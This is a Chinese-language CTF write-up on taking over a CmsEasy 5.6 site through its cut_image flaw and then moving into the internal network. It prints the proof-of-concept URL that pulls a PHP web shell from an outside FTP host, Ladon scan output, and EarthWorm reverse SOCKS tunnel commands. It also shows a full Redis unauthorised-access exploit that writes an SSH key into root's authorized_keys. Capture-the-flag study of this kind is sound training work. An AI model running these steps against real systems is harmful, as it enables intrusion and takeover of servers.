某CTF內網滲透

題目:www.whalwl.site:8021

目錄


cmseasy

簡單看一下網站架構

Apache/2.4.7 (Ubuntu)

PHP/5.5.9

CmsEasy版本5_6_0_20160825_UTF8

查找該程序曆史漏洞,找到一個高危漏洞 “CmsEasy cut_image 代碼執行漏洞

CmsEasy前臺無限制GetShell

Getshell的補充說明

POC:

http://www.whalwl.site:8021/index.php?case=tool&act=cut_image
pic=1ftp://221.xxx.xx.xx/payload.php&w=400&h=300&x1=0&x2=400&y1=0&y2=300

點我下載PHP一句話密碼a


內網橫向滲透

  • 根據flag提示,缺失的第二部分在內網

  • 查看一下內網IP。然後使用Ladon掃描一下內網:

    內網IP:192.168.128.2

  • Ladon掃描C段主機常見開放端口

    給文件加執行權限:

    chmod 777 Ladon64.lnx

    ./Ladon64.lnx 192.168.128.1/24 PortScan >1.txt

LadonGo 3.8 by k8gege
Arch: amd64 OS: linux
Pid: 1540 Process: Ladon64.lnx
Targe: 192.168.128.1/24 ScanStart: 2021-08-19 10:06:18
Load PortScan
192.168.128.3 22 Open SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8
192.168.128.1 22 Open SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2
192.168.128.2 80 Open HTTP/1.1 400 Bad Request Date: Thu, 19 Aug 2021 14:06:26 GMT Server: Apache/2.4.7 (Ubuntu) Content-Length: 304 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at 192.168.128.2 Port 80</address>
</body></html>
192.168.128.3 6379 Open -ERR wrong number of arguments for 'get' command
Finished: 2021-08-19 10:06:28

發現內網機器192.168.128.3 開放6379端口為Redis服務

  • Redis 未授權訪問漏洞

    Redis 默認情况下,會綁定在 0.0.0.0:6379,如果在沒有開啟認證的情况下,可以導致任意用戶在可以訪問目標服務器的情况下未授權訪問 Redis 以及讀取 Redis 的數據。攻擊者在未授權訪問 Redis 的情况下可以利用 Redis 的相關方法,可以成功在 Redis 服務器上寫入公鑰,進而可以使用對應私鑰直接登錄目標服務器。

  • 我們現在已拿到目標內網一臺機器的權限。需要對內網做進一步的滲透,目前我有一臺公網的Ubuntu,一臺內網的Kali,如何反向Socks5將Kali的流量代理進目標內網

    答案是使用 EarthWorm Frp 等這類軟件做反向Socks5代理

我這裏使用EarthWorm

在公網的Ubuntu上執行如下命令:

./ew_for_linux64 -s rcsocks -l 10800 -e 10240 &

公網機器監聽10800和10240端口

目標機器執行如下命令:

./ew_for_linux64 -s rssocks -d 167.160.188.xx -e 10240

linux通過proxychains設置Socks5代理訪問目標內網服務

vi /etc/proxychains.conf

添加:socks5 167.160.188.xx 10800

設置完成後即可使用類似proxychains nmap 192.168.128.1這種方式將nmap的流量代理至目標內網進行掃描,其他命令行工具同理。

windows可以使用Proxifier

現在已經能訪問內網機器了,我們就利用Redis 未授權訪問漏洞獲取目標權限。

Redis未授權訪問漏洞複現

Redis未授權訪問

安裝redis-cli
wget http://download.redis.io/redis-stable.tar.gz
tar -zxvf redis-stable.tar.gz
cd redis-stable
make
cp src/redis-cli /usr/bin/

漏洞利用:

[email protected]:~/tmp# ssh-keygen -t rsa
[email protected]:~/tmp# cd /root/.ssh/
[email protected]:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
[email protected]:~/.ssh# cat /root/.ssh/foo.txt | proxychains redis-cli -h 192.168.128.3 -x set crackit
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-167.160.188.217:10800-<><>-192.168.128.3:6379-<><>-OK
OK
[email protected]:~/.ssh# proxychains redis-cli -h 192.168.128.3
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-167.160.188.217:10800-<><>-192.168.128.3:6379-<><>-OK
192.168.128.3:6379> config set dir /root/.ssh/
OK
192.168.128.3:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.128.3:6379> config set dbfilename "authorized_keys"
OK
192.168.128.3:6379> save
OK
192.168.128.3:6379> exit
[email protected]:~/.ssh# proxychains ssh -i id_rsa [email protected]

獲取flag

cmseasy&內網滲透 Writeup的更多相關文章

  1. 內網滲透測試思路-FREEBUF

    (在拿到webshell的時候,想辦法獲取系統信息拿到系統權限) 一.通過常規web滲透,已經拿到webshell.那麼接下來作重要的就是探測系統信息,提權,針對windows想辦法開啟遠程桌面連接, ...

  2. 內網滲透 關於GPO

    網上有很多講內網滲透的文章,但看來看去還是一老外的博客給力,博客地址:www.harmj0y.net/blog,看完就明白這裏面的很多思路都非常好. 做內網時,有時會碰到目標的機器開防火牆,所有端口基 ...

  3. [原創]K8 Cscan 3.6大型內網滲透自定義掃描器

    前言:無論內網還是外網滲透信息收集都是非常關鍵,信息收集越多越准確滲透的成功率就越高但成功率還受到漏洞影響,漏洞受時效性影響,對於大型內網掃描速度直接影響著成功率漏洞時效性1-2天,掃描內網或外網需1 ...

  4. [原創]K8 cping 3.0大型內網滲透掃描工具

    [原創]K8 Cscan 大型內網滲透自定義掃描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan簡介:何為自定義掃描器?其實也是插件化,但C ...

  5. [源碼]Python簡易http服務器(內網滲透大文件傳輸含下載命令)

    Python簡易http服務器源碼 import SimpleHTTPServerimport SocketServerimport sysPORT = 80if len(sys.argv) != 2 ...

  6. [原創]K8飛刀20150725 支持SOCKS5代理(內網滲透)

    工具: K8飛刀編譯: 自己查殼組織: K8搞基大隊[K8team]作者: K8拉登哥哥博客: http://qqhack8.blog.163.com發布: 2015/7/26 3:41:11 簡介: ...

  7. MSF 內網滲透筆記

    進入meterpreter模式 在meterpreter中輸入shell即可進入CMD窗口接著即可執行CMD命令,例如打開RDP服務REG ADD HKLM\SYSTEM\CurrentControl ...

  8. metasploit滲透測試筆記(內網滲透篇)

    x01 reverse the shell File 通常做法是使用msfpayload生成一個backdoor.exe然後上傳到目標機器執行.本地監聽即可獲得meterpreter shell. r ...

  9. 內網滲透之IPC,遠程執行

    開啟服務 net start Schedule net start wmiApSrv 關閉防火牆 net stop sharedaccess net use \\目標IP\ipc$ "&qu ...

  10. Metasploit 內網滲透篇

    0x01 reverse the shell File 通常做法是使用msfpayload生成一個backdoor.exe然後上傳到目標機器執行.本地監聽即可獲得meterpreter shell. ...

隨機推薦

  1. sublime text3 使用SVN插件

    Simon在項目中經常使用SVN,每次都要切換提交,很麻煩,有了這個SVN插件就很方便了,使用快捷方式提交,更新. 安裝: Ctrl + Shift + P 調用出Sublime Text的包管理工具 ...

  2. GridView布局,自定義適配器,水平滾動

    添加GridItem布局XML文件 <?xml version="1.0" encoding="utf-8"?> <LinearLayout ...

  3. DLL項目報錯:fatal error lnk1104: cannot open file &quot;...\xxx.dll&quot;

    在生成DLL的時候報這個錯, 生成不了DLL 檢查生成DLL的路徑是否有其他程序在使用... 或者把殺毒軟件關了試試...

  4. NGUI3.5系列教程之 UILabel

    此NGUI版本為:3.5.1 NGUI 的UILabel脚本下的文字框可以用BBCode設置:[b]Bold[/b] 粗體 [i]italic[/i] 斜體 [u]underline[/u]下劃線 [ ...

  5. SqlServer保留幾比特小數的兩種做法

    SqlServer保留幾比特小數的兩種做法   數據庫裏的 float momey 類型,都會精確到多比特小數.但有時候 我們不需要那麼精確,例如,只精確到兩比特有效數字. 解决: 1. 使用 Round( ...

  6. atom插件

    1.Sync Settings 搭配github,同步你的atom插件信息,配置信息,讓你輕松實現一臺電腦配置,多臺電腦共享. 2.Emmet 能够基於Emmet語法產生HTML,做過前段開發的不會不 ...

  7. CS Academy Sliding Product Sum(組合數)

    題意 有一個長為 \(N\) 的序列 \(A = [1, 2, 3, \dots, N]\) ,求所有長度 \(\le K\) 的子串權值積的和,對於 \(M\) 取模. \(N \le 10^{18 ...

  8. Python hasattr() 函數 // python中hasattr()、getattr()、setattr()函數的使用

    http://www.runoob.com/python/python-func-hasattr.html https://www.cnblogs.com/zanjiahaoge666/p/74752 ...

  9. linux中文件名有英文括號的問題

    文件名包含“()”的文件,輸入“(“後按TAB鍵無法補全,手動輸入文件全名也删除不了:提示bash: syntax error near unexpected token `('錯誤. 在linux中 ...

  10. T-SQL 邏輯控制語句 ifelse while casewhen

    ifelse,如果邏輯語句有多行,用begin end 包裹 use StudentManageDB go --查詢成績 declare @cAvg int select @cAvg=avg(CSha ...